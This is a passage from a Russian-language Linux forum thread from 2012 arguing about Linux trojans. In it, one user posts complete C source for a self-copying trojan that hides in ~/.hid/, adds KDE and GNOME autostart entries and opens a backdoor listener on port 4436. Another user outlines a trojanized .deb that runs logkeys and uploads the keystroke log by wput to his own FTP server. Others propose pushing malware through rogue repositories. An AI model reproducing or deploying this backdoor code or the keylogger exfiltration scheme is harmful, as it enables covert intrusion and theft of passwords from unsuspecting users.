Обнаружен первый в истории троянец для Linux.

ikkunan salvataja · 13-09-12 11:51:27

kenzzzooo пишет:

Слева, в проекте, никаких ассоциаций не вызывает?

Ну у меня ассоциации вызвало builder заголовке окна. Прямую ссылку на Orca можно? Посмотрим как оно там будет выглядеть.
Ну и касательно какого setup.exe я не видел. Бывают конечно и такие exe, которые самораспаковывающийся архив, но в общем случае дело несколько печальнее. Во всяком случае в линуксе как правило до установки пакета узнать чего и куда он писать будет проще чем в винде.

kenzzzooo · 13-09-12 12:17:29

ikkunan salvataja пишет:

Прямую ссылку на Orca можно?

http://bigvax.nm.ru/orca.zip - Там не все так красиво smile

ikkunan salvataja пишет:

Ну и касательно какого setup.exe я не видел. Бывают конечно и такие exe, которые самораспаковывающийся архив, но в общем случае дело несколько печальнее. Во всяком случае в линуксе как правило до установки пакета узнать чего и куда он писать будет проще чем в винде.

стандартный для винды все же msi, а не setup.exe. Вы же сравниваете rpm-пакет, стандартный для определенного дистрибутива, и возможности его просмотра с возможностями msi, который стандарт для винды (то, что есть другие варинты - сути не меняет). При чем тут setup.exe? Если в линуксе будет бинарник, который будет устанавливать прогу из зашифрованного архива своей собственной структуры, и я попрошу Вас указать куда и что он будет писать, то Вы сможете мне ответить?

ikkunan salvataja · 13-09-12 12:51:59

kenzzzooo пишет:

Там не все так красиво

Это да. наглядность прямо на высшем уровне.

kenzzzooo пишет:

Вы же сравниваете rpm-пакет, стандартный для определенного дистрибутива,

Ну вообще то до лампочки для какого дистрибутива, равно как и до лампочки deb это или rpm.

NEMO · 13-09-12 13:07:08

Продолжаю работать над своим троянчиком. Пока выкладываю текущие наработки:

Скрытый текст:

#include <sys/stat.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <sys/sendfile.h>
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <dirent.h>
 
#define VERBOSE
//#define STREAMTOFILE

#ifdef STREAMTOFILE
  #define LOGSTREAM log
#else
  #define LOGSTREAM stdout
#endif

#define AS_KDE4 0
#define AS_OTHER 1

#define LINK ".desktop"
#define HIDPATH "/.hid/"
#define KDEPATH "/.kde4/"
#define GNMPATH "/.config/autostart/"
#define FILENAME "sysf2"


#define HFILE ".sys/sysf2"

#define LISTENPORT 4436

#define PT_CHANGEDIR 0
#define PT_DIRCONTENT 1


char buffer[255],buffer2[255];
#ifdef STREAMTOFILE
FILE *log;
#endif

int FolderExist(char *path)
{
  struct stat st;
  return (stat(path,&st) == 0) && ((st.st_mode & S_IFMT) == S_IFDIR);
}

int FileExist(char *path)
{
  struct stat st;
  return (stat(path,&st) == 0);
}

void SetAutostart(int DE, char *homepath, char *exepath)
{
  FILE * f;
  char *filepath;
  switch(DE)
  {
    case AS_KDE4:
      filepath = strcat(strcat(strcat(strcpy(buffer,homepath),KDEPATH),"Autorun/"),FILENAME);
      break;
    case AS_OTHER:
      filepath = strcat(strcat(strcat(strcpy(buffer,homepath),GNMPATH),FILENAME),LINK);
      break;
  }
  
  if(FileExist(filepath))
  {
    #ifdef VERBOSE
    fprintf(LOGSTREAM,"Autostart already set!\n");
    #endif
    return;
  }
  f = fopen (filepath, "w+");
  switch(DE)
  {
    case AS_KDE4:
      fprintf (f, "#!/bin/bash\n");
      fprintf(f, "%s\n",exepath);
      break;
    case AS_OTHER:
      fprintf (f, "[Desktop Entry]\nExec=%s\nName=Xynta\nType=Application\n",exepath);
      break;
  }
  chmod (filepath, 511);
  fclose(f);
  #ifdef VERBOSE
  fprintf(LOGSTREAM,"Success!\n");
  #endif
  return;
}

char EnumResult[4096];

void EnumDir(char *edir)
{
  char tmp[256];
  struct stat st;
  DIR *d;
  int first = 0;
  struct dirent *dir;
  EnumResult[0] = 0;
  d = opendir(edir);
  if (d)
  {
    while ((dir = readdir(d)) != NULL)
    {
    if(first==0)
        first=1;
    else strcat(EnumResult,"|");
    if(stat(strcat(strcpy(tmp,edir),dir->d_name),&st) == 0 && ((st.st_mode & S_IFMT) == S_IFDIR))
        strcat(EnumResult,"*");
    strcat(EnumResult,dir->d_name);
    }
    closedir(d);
  }
  return;
}

void SendPacket(int sock, int ptype, int len, char* data)
{
    send(sock, &ptype, 1, 0);
    send(sock, &len, 4, 0);
    send(sock, data, len, 0);
}

char cd[512];
char buf[65535];
void BackdoorIt()
{
  int sock, listener;
  int ptype;
  int plen;
  struct sockaddr_in addr;
  
  int bytes_read;

  listener = socket(AF_INET, SOCK_STREAM, 0);
  if(listener < 0)
  {
      #ifdef VERBOSE
      fprintf(LOGSTREAM,"Socket error!\n");
      #endif
      return;
  }
  addr.sin_family = AF_INET;
  addr.sin_port = htons(LISTENPORT);
  addr.sin_addr.s_addr = htonl(INADDR_ANY);
  if(bind(listener, (struct sockaddr *)&addr, sizeof(addr)) < 0)
  {
      #ifdef VERBOSE
      fprintf(LOGSTREAM,"Bind error! Port %d in use. (Maybe system already infected)\n",LISTENPORT);
      #endif
      return;
  }
  listen(listener, 1);
  while(1)
  {
      #ifdef VERBOSE
      fprintf(LOGSTREAM,"Waiting for client...\n");
      #endif
      sock = accept(listener, NULL, NULL);
      if(sock < 0)
      {
      #ifdef VERBOSE
      fprintf(LOGSTREAM,"Accept error!\n");
      #endif
      return;
      }
      #ifdef VERBOSE
      fprintf(LOGSTREAM,"Incoming connection.\n");
      #endif
      while(1)
      {
        if(recv(sock, buf, 1, 0) <= 0) break;
        ptype = buf[0];
        if(recv(sock, &plen, 4, 0) <= 0) break;
        if(recv(sock, buf, plen, 0) <= 0) break;

          switch(ptype)
        {
            case PT_CHANGEDIR:
                strcpy(cd,buf);
                cd[plen] = 0;
                #ifdef VERBOSE
                fprintf(LOGSTREAM,"cd %s\n",cd);
                #endif
                EnumDir(cd);
                SendPacket(sock,PT_DIRCONTENT,strlen(EnumResult),EnumResult);
            break;
        }
      }
      #ifdef VERBOSE
      fprintf(LOGSTREAM,"Disconnected.\n");
      #endif
      close(sock);
  }
  return;
}
 

int main(int argc, char * argv[])
{
  int fullpath = 0;
  char *home, *hid, *src;
  char *p;
  int read_fd;
  int write_fd;
  struct stat stat_buf;
  off_t offset = 0;
  
  home = getenv("HOME");
  #ifdef VERBOSE
  #ifdef STREAMTOFILE
  log = fopen(strcat(strcpy(buffer,home),"/vlog.txt"),"w+");
  #endif
  #endif
  
  char *cfn = argv[0];
  if(strcspn(cfn,"/home/") == 0)
    fullpath++;
  
  hid = strcat(strcpy(buffer,home),HIDPATH);
  if(!FolderExist(hid))
    mkdir(hid,511);
  
  if(!FileExist(strcat(strcat(strcpy(buffer2,home),HIDPATH),FILENAME)))
  {
      if(fullpath == 0)
      {
    getcwd(buffer, 255);
    p = strrchr(cfn,'/');
    strcat(buffer,p);
    src = buffer;
      }
      else src = cfn;
      read_fd = open (src, O_RDONLY);
      fstat (read_fd, &stat_buf);
      write_fd = open (buffer2, O_WRONLY | O_CREAT, stat_buf.st_mode);
      sendfile (write_fd, read_fd, &offset, stat_buf.st_size);
      close (read_fd);
      close (write_fd);
      chmod (buffer, 511);
      #ifdef VERBOSE
      fprintf(LOGSTREAM,"Copy file...\n",buffer);
      #endif
    
  }
  #ifdef VERBOSE
  else
  {
    fprintf(LOGSTREAM,"File already copied!\n",buffer);
  }
  #endif
  
  if(FolderExist(strcat(strcpy(buffer,home),KDEPATH)))
  {
    if(!FolderExist(strcat(buffer,"Autorun/")))
      mkdir(buffer,511);
    #ifdef VERBOSE
    fprintf(LOGSTREAM,"Set KDE4 autostart\n");
    #endif
    SetAutostart(AS_KDE4,home,buffer2);
  }
  else //TODO XFCE
  {
    if(!FolderExist(strcat(strcpy(buffer,home),GNMPATH)))
        mkdir(buffer,511);
    #ifdef VERBOSE
    fprintf(LOGSTREAM,"Maybe its Gnome or Unity?\n");
    #endif
    SetAutostart(AS_OTHER,home,buffer2);
  }
  
  #ifdef VERBOSE
  #ifdef STREAMTOFILE
  fprintf(LOGSTREAM,"Closing log...\n");
  fclose(log);
  #endif
  #endif
  BackdoorIt();
  return 0;
}

Итак, что этот шмоток кода уже умеет: при запуске копироваться в скрытую папку и прописываться в автозагрузку KDE4, Unity и Gnome(v3 не тестил). После этого вешается на порт 4436 и ждет клиента. Пока только умеет отсылать содержимое запрашиваемого каталога. Клиент я уже написал, но на шарпе и на винду. Не сочтите за трололо, просто мне так легче и быстрее сделать оконное приложение.
В работе:

Вывод текста можно убрать, закомментив директиву VERBOSE. А вообще запускается без консольки. Найдете баги, недоработки, будут пожелания - пишите.

kenzzzooo · 13-09-12 13:30:34

ikkunan salvataja пишет:

Это да. наглядность прямо на высшем уровне.

но работает smile и можно изменять/добавлять таблицы, а также редактировать их структуру и создавать пакеты smile

ikkunan salvataja · 13-09-12 13:48:47

kenzzzooo пишет:

но работает

Но тем не менее распознавание потенциальных зловредов в линуксе это более тривиальная задача нежели в Божественной.

NEMO пишет:

Итак, что этот шмоток кода уже умеет:

Молодец, давай работай дальше. Когда закончишь я тебе сообщу как следует запускать программы не из официальных репов, а вот такого происхождения.

kenzzzooo · 13-09-12 13:50:17

ikkunan salvataja пишет:

Но тем не менее распознавание потенциальных зловредов в линуксе это более тривиальная задача нежели в Божественной.

ничуть smile и там и тут - нужно знать и понимать smile

NEMO · 13-09-12 13:56:30

ikkunan salvataja пишет:

Когда закончишь я тебе сообщу как следует запускать программы не из официальных репов, а вот такого происхождения.

Намек понял, но вот смотрю на людей с андроидами и думаю, чего им официальный магазин не нравится?

Rector · 13-09-12 14:04:46

NEMO, Вот это уже что-то. Так глядишь и родится реальный бекдур -)

ikkunan salvataja · 13-09-12 14:07:19

kenzzzooo пишет:

ничуть smile и там и тут - нужно знать и понимать

Я про то, что под Божественной это несколько более муторно будет. По типу как для установки одной софтинки требуется ввести лицензионный код, записанный на CD естественно, из 20 буквенно-цифровых символов, а для установки другой — из 100 цифровых.
Какую софтинку при прочих равных будет муторнее устанавливать?

NEMO · 13-09-12 14:18:07

ikkunan salvataja пишет:

а для установки другой — из 100 цифровых.

Таких на СD не встречал. Как правило, длинные ключи получают по почте.

ikkunan salvataja · 13-09-12 14:26:46

NEMO пишет:

Таких на СD не встречал.

Это я просто для примера. Действия то в обоих случаях одинаково тривиальные, но разница есть.
PS: Но ты не отвлекайся, совершенствуй своего трояна. Даю слово, как допишешь — я его у себя обязательно запущу.

Редактировался ikkunan salvataja (13-09-12 14:37:18)

selenscy · 13-09-12 15:52:24

wr224 пишет:

p.s. Вернее они доступны, но не все знают где искать

Не забываем и про торренты wink Как правило практически все вначале устанавливают именно оттуда.

А так даже кейлоггеры с сорцами у пенгванутых, хы-хы! Подсовываем пенгванутому хомячку в пакетик с флешплеером lol какой нибудь logkeys, софтинку для отправки лога на какой нибудь айпишник, скриптик в init.d. Улыбаемсо и машем, улыбаемсо и машем smile

straus · 13-09-12 16:31:17

wr224 пишет:

А делается все проще простого - создается какое-нибудь зеркало с пакетами популярного дистрибутива старой версии, оф репозитории которого уже недоступны, например Debian 5 или OpenSuSE 10, и в каждый пакет подсовывается зловред

selenscy пишет:

А так даже кейлоггеры с сорцами у пенгванутых, хы-хы! Подсовываем пенгванутому хомячку в пакетик с флешплеером какой нибудь logkeys, софтинку для отправки лога на какой нибудь айпишник, скриптик в init.d.

Скрытый текст:

Так где оно, где хотя бы единичное заражение, хоть один заблокированный linux!!!??? Дайте хотя бы жёлтую ссылку на какого нибудь Карманова с душераздирающей истории его мытарств в linux и красивыми скриншотами, который словил подобное чудо, чёрт с ним с действующим экземпляром!

selenscy · 13-09-12 17:00:13

straus пишет:

Так где оно, где хотя бы единичное заражение, хоть один заблокированный linux!!!??? Дайте хотя бы жёлтую ссылку на какого нибудь Карманова с душераздирающей истории его мытарств в linux и красивыми скриншотами, который словил подобное чудо, чёрт с ним с действующим экземпляром!

Хе-хе-хе!!! На х*й блокировать то!!! Ты прикинь, добавляем в деб пакетик с супер-пупер-мега флешплеером, типа собственноручно изваяного на коленке (а ведь флеш плеер больше для поделия не будет big_smile ) чтобы посмотреть какой нито ролик, logkeys, wput, шкриптик в крон tongue Даже программить ничо не надо lol

Я, лично, больше чем уверен, что скачают как миленькие, причём одна из причин будет, что для поделия по вашим дебильным утверждениям малвари нет smile И соответственно никакие антивири НИНУЖНЫ!!! Думайте так и дальше lol lol lol Особенно подумайте над тем, что КАЖДЫЙ швабодный джастфофанщеГ на уебанте (а это ведь линупс lol lol lol ) из числа сестрёнок, подружек, дедушек, бабушек и собак с кошками, которыми вы установили поделие будут проверять с лупой, что притащил себе этот пакет big_smile Да-да-да!!! Именно так!

Я всё таки на выходных изваяю пакетик на эту тему wink

Редактировался selenscy (13-09-12 17:37:52)

Белая рысь · 13-09-12 17:12:32

straus пишет:

Дайте хотя бы жёлтую ссылку на какого нибудь Карманова

Да пожалуйста. lol

ikkunan salvataja · 13-09-12 19:35:48

selenscy пишет:

Я всё таки на выходных изваяю пакетик на эту тему

С нетерпением ждём. Хотелось бы ещё конечно и в rpm завёрнутый увидеть, ну да ладно, сам перепакую перед запуском. Ну а не будет пакетика, в общем сам понимаешь...

TrollWINNT · 13-09-12 22:19:47

Цирк блин smile . Троянец под линь не сложнее такого же под винду. Спасает только то, что проги ставятся с реп ну и неуловимый джо не последнюю роль играет smile .
2 NEMO, Как идея можно в том же deb пакете добавить свой левый репозитарий(как, например, это делает опера). Потом попытаться скормить из него клон какой нибудь известной проги под видом обновления. В принципе можно будет добиться массового заражения smile . А так об дизассемблировании для поиска заразы читать весело smile ikkunan salvataja, жги исчо big_smile . Так и представляю себе Мариванну дизассемблирующую прогу smile

ikkunan salvataja · 13-09-12 22:50:22

TrollWINNT пишет:

Потом попытаться скормить из него клон какой нибудь известной проги под видом обновления.

Во, точно. Подпихнуть туда ссылку на образ какого-нибудь zver-DVD, чтобы с него обновилось. Ну а после обновления с вирусами куда проще будет.

IvanOFF · 14-09-12 01:21:33

ikkunan salvataja пишет:

Ну а не будет пакетика, в общем сам понимаешь...

В общем я продолжаю тихо охуевать от представителей сообчества. Пингвин вроде никаким боком страусу не родня, однако желание прятать голову в песок разумному объяснению не поддается.

Сегодня отрасль вирусописательства насквозь коммерциализована. Если мотивы того же автора "Чернобыля" покрыты мраком, то мотивы современных дельцов очевидны - получение денег. Тем более пойманый троян на все 100% соответствует признакам "коммерческого вируса". Ну не будет никто писать такое ради прикола, а если его написали, значит это кому то нужно.

Проще говоря кто-то решил постричь и линукс пользователей. Но вместо того, чтобы почесать репку и принять первентивные меры соопчество решило принять позу страуса, которая как раз удобна для подойти сзади и отиметь.

Господа, ну подумать головой можно! Для чего писали данный троян? Прикола ради? Или для вполне конкретных целей личного обогащения?

Здесь будет уместно напомнить про пользователей МакОС, тоже любивших позу страуса, и ботнета на Маках. После чего вспомнить, что архитектурно Мак и Линукс - близнецы братья.

Короче - умный поймет, а дураков и в церкви бьют.

Белая рысь · 14-09-12 01:40:43

IvanOFF, забейте. Вы видели, что в моей ветке творится? Ну, нет у линуксоидов вирусов. Нигде нет, и в винде тоже.
Кста, ставьте +, тринадцатым будете. smile

Редактировался Белая рысь (14-09-12 01:41:56)

selenscy · 14-09-12 12:52:42

TrollWINNT пишет:

Цирк блин . Троянец под линь не сложнее такого же под винду. Спасает только то, что проги ставятся с реп ну и неуловимый джо не последнюю роль играет .

Совершенно верно!

TrollWINNT пишет:

ikkunan salvataja, жги исчо . Так и представляю себе Мариванну дизассемблирующую прогу

Ну пенгванутый, хуле wink

Кстате, накидал тут покетик тестовый wink Работает, шлёт мне лог клавы, явки, пароли каждый час cool

Добавлено спустя 10 мин 36 с:

ikkunan salvataja пишет:

С нетерпением ждём. Хотелось бы ещё конечно и в rpm завёрнутый увидеть, ну да ладно, сам перепакую перед запуском. Ну а не будет пакетика, в общем сам понимаешь...

Хи-хи-хи! Не пирижывай! Усё буит оррлайт!!! По крайней мере под уебантой 10.04 арбайтает wink Думаю, что и под другими уебантами тоже будет.

Редактировался selenscy (14-09-12 13:14:31)

ikkunan salvataja · 14-09-12 13:13:10

IvanOFF пишет:

Но вместо того, чтобы почесать репку и принять первентивные меры соопчество решило принять позу страуса, которая как раз удобна для подойти сзади и отиметь.

Значит так, во первых получивши пакет из недоверенного источника я первым делом поинтересуюсь а не хочет ли сия софтинка работать демоном, это делается на счёт раз путём элементарного просмотра rpm-файла как архива. Ежели такое наличествует то такой пакет сразу же будет послан куда подальше. Но допустим такого нету и задача пакета тырить информацию из пользовательского каталога и передавать её по назначению. Будет она это делать или нет я не знаю, но я знаю что в редакторе меню KDE есть вот такая вкладочка (кстати, а где можно посмотреть на подобный редактор в Божественной?)

И соответственно для запуска подобных софтинок создаётся некий фейковый юзер, домашний каталог которого лежит внутри каталога основного пользователя, этот юзер вполне может из этого каталога основного пользователя читать, может там создавать файлы, но поскольку на каталоге стоит sticky бит, то поудалять он там сможет только то, что сам и наваял, тоже самое относится и к переименованию. Далее, помимо всего этот фейковый юзер входит в группу noinet, в отношении которой действует правило
iptables -A OUTPUT -m owner --gid-owner noinet -j DROP.
Спрашивается, какую гадость этот вирус может сделать на моём компе?

selenscy · 14-09-12 13:24:12

ikkunan salvataja пишет:

я первым делом поинтересуюсь а не хочет ли сия софтинка работать демоном,

Демона не будет smile Мы поступим проще tongue Положится пара скриптиков при установке в /etc/cron.hourly например wink logkeys -s -o /var/log/keys, wput /var/log/keys ftp://куда_мне_надо cool

Больше то и не надо. Действительно данная фигня ничего не делает lol

Редактировался selenscy (14-09-12 13:24:43)

Форум StopLinux

Объявление

#176 13-09-12 11:51:27

Re: Обнаружен первый в истории троянец для Linux.

#177 13-09-12 12:17:29

Re: Обнаружен первый в истории троянец для Linux.

#178 13-09-12 12:51:59

Re: Обнаружен первый в истории троянец для Linux.

#179 13-09-12 13:07:08

Re: Обнаружен первый в истории троянец для Linux.

#180 13-09-12 13:30:34

Re: Обнаружен первый в истории троянец для Linux.

#181 13-09-12 13:48:47

Re: Обнаружен первый в истории троянец для Linux.

#182 13-09-12 13:50:17

Re: Обнаружен первый в истории троянец для Linux.

#183 13-09-12 13:56:30

Re: Обнаружен первый в истории троянец для Linux.

#184 13-09-12 14:04:46

Re: Обнаружен первый в истории троянец для Linux.

#185 13-09-12 14:07:19

Re: Обнаружен первый в истории троянец для Linux.

#186 13-09-12 14:18:07

Re: Обнаружен первый в истории троянец для Linux.

#187 13-09-12 14:26:46

Re: Обнаружен первый в истории троянец для Linux.

#188 13-09-12 15:52:24

Re: Обнаружен первый в истории троянец для Linux.

#189 13-09-12 16:31:17

Re: Обнаружен первый в истории троянец для Linux.

#190 13-09-12 17:00:13

Re: Обнаружен первый в истории троянец для Linux.

#191 13-09-12 17:12:32

Re: Обнаружен первый в истории троянец для Linux.

#192 13-09-12 19:35:48

Re: Обнаружен первый в истории троянец для Linux.

#193 13-09-12 22:19:47

Re: Обнаружен первый в истории троянец для Linux.

#194 13-09-12 22:50:22

Re: Обнаружен первый в истории троянец для Linux.

#195 14-09-12 01:21:33

Re: Обнаружен первый в истории троянец для Linux.

#196 14-09-12 01:40:43

Re: Обнаружен первый в истории троянец для Linux.

#197 14-09-12 12:52:42

Re: Обнаружен первый в истории троянец для Linux.

#198 14-09-12 13:13:10

Re: Обнаружен первый в истории троянец для Linux.

#199 14-09-12 13:24:12

Re: Обнаружен первый в истории троянец для Linux.

Подвал форума